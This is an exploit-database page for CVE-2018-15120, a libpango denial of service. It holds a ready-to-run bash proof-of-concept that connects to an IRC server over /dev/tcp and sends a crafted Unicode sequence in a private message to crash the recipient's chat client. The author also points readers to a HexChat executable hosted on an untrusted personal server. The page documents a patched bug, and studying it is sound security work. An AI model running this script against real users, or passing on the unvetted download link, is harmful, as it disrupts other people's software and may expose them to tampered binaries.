Libpango 1.40.8 Denial Of Service

2018.08.28
Credit: Jeffery M
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC) # Date: 2018-08-06 # Exploit Author: Jeffery M # Vendor Homepage: https://www.pango.org/ # Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz # Version: 1.40.8+ # Tested on: Windows 7, Gentoo # CVE : CVE-2018-15120 # Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f # Description: # Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the # Emoji iter code into returning an empty segment, which then triggers # an assertion in the itemizer. # POC: # Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an # irc server with something linked against libpango 1.40.8 or higher # (e.g. hexchat 2.14.1 [ can be obtained on my server # http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run # the following: irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F' This is a rudimentary example of how this attack can be used. #!/bin/bash # Name: irc_com_dump # Save this script as irc_com_dump # run as follows on irc.laks.ml or a server of your choice # irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F' # When the user receives the message it will trigger the assertion fail. ### helpfunc () { sed -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0; } if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then helpfunc && exit 1 fi # So we can send unicode without having to do shit. LC_ALL=en_US.utf8 export LC_ALL export allargs=("$@") #test_ping () #{ # if [[ ! -n $PING ]]; then # export PING="$(echo $h| awk '/PING/{print "PONG "$2}')"; # fi; #} if [[ -n ${DEBUG} ]] ; then declare -p allargs fi export name=magicrun${RANDOM} if [[ -n ${NORANDOM} ]] ; then export name=magicdebug fi run_irc_com () { set -vx echo ${allargs[1]} # if ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[ ${allargs[1]} =~ [0-9].*[0-9] ]] && [[ ! ${allargs[0]} =~ .*[.].* ]] || true) ) ) ; then if [[ ! ${allargs[0]} =~ .*[.].* && ${allargs[1]} =~ ^[0-9]+[0-9]?$ && ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then export COMM="$@"; else export s=$1 export p=$2 export COMM="${@:3}" if [[ $p =~ .*[a-zA-Z] ]] ; then unset s p export COMM="${allargs[@]}" fi fi test -z $s||false && exec 5<> /dev/tcp/irc.laks.ml/6667 || test -n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p set +vx echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5 2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do if [[ ! -n $PING ]]; then export PING="$(echo $h| awk '/PING/{print "PONG "$2}')"; fi; ## test_ping; echo -e "${PING}\n" 1>&5 if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then export PINGSENT=isentmyping; fi; if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then echo -e "${COMM}\nQUIT\n" 1>&5 2>&1 fi echo "$h" 2>&1; done } run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name :+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR :Closing/d' | awk -F" $name " '{print $2}'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top